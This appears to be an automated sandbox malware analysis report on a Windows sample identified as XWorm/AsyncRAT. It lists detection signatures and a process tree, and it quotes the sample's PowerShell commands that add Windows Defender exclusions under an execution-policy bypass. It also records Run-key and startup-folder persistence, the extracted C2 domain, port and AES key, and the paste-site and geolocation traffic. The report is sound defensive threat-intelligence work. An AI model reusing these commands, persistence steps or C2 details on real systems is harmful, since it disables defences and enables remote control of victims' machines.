Edit tour

Windows Analysis Report
owuP726k3d.exe

Overview

General Information

Sample name:	owuP726k3d.exe renamed because original name is a hash value
Original sample name:	4d3101ba1ec70ddd04a30b6f04a67817920a6601e477339e5c135c167f6ab1e2.exe
Analysis ID:	1561591
MD5:	04f89f83ba27038601e2321b08d0b4ca
SHA1:	edecd6d74ac90bbd235334ee17c2cae0ababa51b
SHA256:	4d3101ba1ec70ddd04a30b6f04a67817920a6601e477339e5c135c167f6ab1e2
Tags:	exeuser-Chainskilabs
Infos:

Detection

AsyncRAT, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AsyncRAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Check if machine is in data center or colocation facility

Connects to a pastebin service (likely for C&C)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

owuP726k3d.exe (PID: 6848 cmdline: "C:\Users\user\Desktop\owuP726k3d.exe" MD5: 04F89F83BA27038601E2321B08D0B4CA)

powershell.exe (PID: 5916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\owuP726k3d.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'owuP726k3d.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4052 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Windows Defender.exe (PID: 6324 cmdline: "C:\Users\user\AppData\Roaming\Windows Defender.exe" MD5: 04F89F83BA27038601E2321B08D0B4CA)

Windows Defender.exe (PID: 7132 cmdline: "C:\Users\user\AppData\Roaming\Windows Defender.exe" MD5: 04F89F83BA27038601E2321B08D0B4CA)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["george-liechtenstein.gl.at.ply.gg"], "Port": 2030, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
owuP726k3d.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
owuP726k3d.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
owuP726k3d.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
owuP726k3d.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8fa5:$s6: VirtualBox 0x8f03:$s8: Win32_ComputerSystem 0x9c59:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9cf6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9e0b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x95e7:$cnc4: POST / HTTP/1.1

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Windows Defender.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Roaming\Windows Defender.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Roaming\Windows Defender.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Roaming\Windows Defender.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8fa5:$s6: VirtualBox 0x8f03:$s8: Win32_ComputerSystem 0x9c59:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9cf6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9e0b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x95e7:$cnc4: POST / HTTP/1.1

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2727195989.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000000.1470196010.00000000008D2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000000.00000000.1470196010.00000000008D2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000000.1470196010.00000000008D2000.00000002.00000001.01000000.00000003.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8da5:$s6: VirtualBox 0x8d03:$s8: Win32_ComputerSystem 0x9a59:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9af6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9c0b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x93e7:$cnc4: POST / HTTP/1.1
Process Memory Space: owuP726k3d.exe PID: 6848	JoeSecurity_XWorm	Yara detected XWorm	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.owuP726k3d.exe.8d0000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.0.owuP726k3d.exe.8d0000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.0.owuP726k3d.exe.8d0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.owuP726k3d.exe.8d0000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8fa5:$s6: VirtualBox 0x8f03:$s8: Win32_ComputerSystem 0x9c59:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9cf6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9e0b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x95e7:$cnc4: POST / HTTP/1.1

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\owuP726k3d.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\owuP726k3d.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\owuP726k3d.exe", ParentImage: C:\Users\user\Desktop\owuP726k3d.exe, ParentProcessId: 6848, ParentProcessName: owuP726k3d.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\owuP726k3d.exe', ProcessId: 5916, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\owuP726k3d.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\owuP726k3d.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\owuP726k3d.exe", ParentImage: C:\Users\user\Desktop\owuP726k3d.exe, ParentProcessId: 6848, ParentProcessName: owuP726k3d.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\owuP726k3d.exe', ProcessId: 5916, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Windows Defender.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\owuP726k3d.exe, ProcessId: 6848, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\owuP726k3d.exe, ProcessId: 6848, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender.lnk

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\owuP726k3d.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\owuP726k3d.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\owuP726k3d.exe", ParentImage: C:\Users\user\Desktop\owuP726k3d.exe, ParentProcessId: 6848, ParentProcessName: owuP726k3d.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\owuP726k3d.exe', ProcessId: 5916, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T21:09:24.374656+0100	2803305	3	Unknown Traffic	192.168.2.8	49715	172.67.75.40	443	TCP
2024-11-23T21:09:28.238462+0100	2803305	3	Unknown Traffic	192.168.2.8	49726	172.67.75.40	443	TCP
2024-11-23T21:09:32.033328+0100	2803305	3	Unknown Traffic	192.168.2.8	49732	172.67.75.40	443	TCP
2024-11-23T21:09:35.771707+0100	2803305	3	Unknown Traffic	192.168.2.8	49743	172.67.75.40	443	TCP
2024-11-23T21:09:39.784498+0100	2803305	3	Unknown Traffic	192.168.2.8	49754	172.67.75.40	443	TCP
2024-11-23T21:09:47.639706+0100	2803305	3	Unknown Traffic	192.168.2.8	49772	172.67.75.40	443	TCP
2024-11-23T21:09:51.453116+0100	2803305	3	Unknown Traffic	192.168.2.8	49783	172.67.75.40	443	TCP
2024-11-23T21:09:55.270576+0100	2803305	3	Unknown Traffic	192.168.2.8	49789	172.67.75.40	443	TCP
2024-11-23T21:09:59.007877+0100	2803305	3	Unknown Traffic	192.168.2.8	49800	172.67.75.40	443	TCP
2024-11-23T21:10:02.867510+0100	2803305	3	Unknown Traffic	192.168.2.8	49811	172.67.75.40	443	TCP
2024-11-23T21:10:06.735068+0100	2803305	3	Unknown Traffic	192.168.2.8	49817	172.67.75.40	443	TCP
2024-11-23T21:10:10.758293+0100	2803305	3	Unknown Traffic	192.168.2.8	49829	172.67.75.40	443	TCP
2024-11-23T21:10:15.739621+0100	2803305	3	Unknown Traffic	192.168.2.8	49839	172.67.75.40	443	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T21:09:31.181886+0100	2855924	1	Malware Command and Control Activity Detected	192.168.2.8	49712	147.185.221.19	2030	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: owuP726k3d.exe

Avira: detected

Antivirus detection for URL or domain

Source: george-liechtenstein.gl.at.ply.gg

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Windows Defender.exe

Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: owuP726k3d.exe

Malware Configuration Extractor: Xworm {"C2 url": ["george-liechtenstein.gl.at.ply.gg"], "Port": 2030, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Windows Defender.exe

ReversingLabs: Detection: 78%

Multi AV Scanner detection for submitted file

Source: owuP726k3d.exe

ReversingLabs: Detection: 78%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Windows Defender.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: owuP726k3d.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: owuP726k3d.exe	String decryptor: george-liechtenstein.gl.at.ply.gg
Source: owuP726k3d.exe	String decryptor: 2030
Source: owuP726k3d.exe	String decryptor: <123456789>
Source: owuP726k3d.exe	String decryptor: <Xwormmm>
Source: owuP726k3d.exe	String decryptor: XWorm V5.6
Source: owuP726k3d.exe	String decryptor: USB.exe
Source: owuP726k3d.exe	String decryptor: %AppData%
Source: owuP726k3d.exe	String decryptor: Windows Defender.exe

Source: owuP726k3d.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.8:49817 version: TLS 1.2

Source: owuP726k3d.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49712 -> 147.185.221.19:2030

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: george-liechtenstein.gl.at.ply.gg

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: rentry.co

Yara detected Generic Downloader

Source: Yara match	File source: owuP726k3d.exe, type: SAMPLE
Source: Yara match	File source: 0.0.owuP726k3d.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Windows Defender.exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.8:49712 -> 147.185.221.19:2030

Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 172.67.75.40 172.67.75.40

Source: Joe Sandbox View

ASN Name: SALSGIVERUS SALSGIVERUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ip-api.com

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 172.67.75.40:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49754 -> 172.67.75.40:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49743 -> 172.67.75.40:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49732 -> 172.67.75.40:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49772 -> 172.67.75.40:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49783 -> 172.67.75.40:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49726 -> 172.67.75.40:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49817 -> 172.67.75.40:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49839 -> 172.67.75.40:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49811 -> 172.67.75.40:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49829 -> 172.67.75.40:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49789 -> 172.67.75.40:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49800 -> 172.67.75.40:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /8wum7vax/raw HTTP/1.1Host: rentry.co
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: george-liechtenstein.gl.at.ply.gg
Source: global traffic	DNS traffic detected: DNS query: rentry.co

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 23 Nov 2024 20:09:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8088Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 23 Nov 2024 20:09:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8067Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
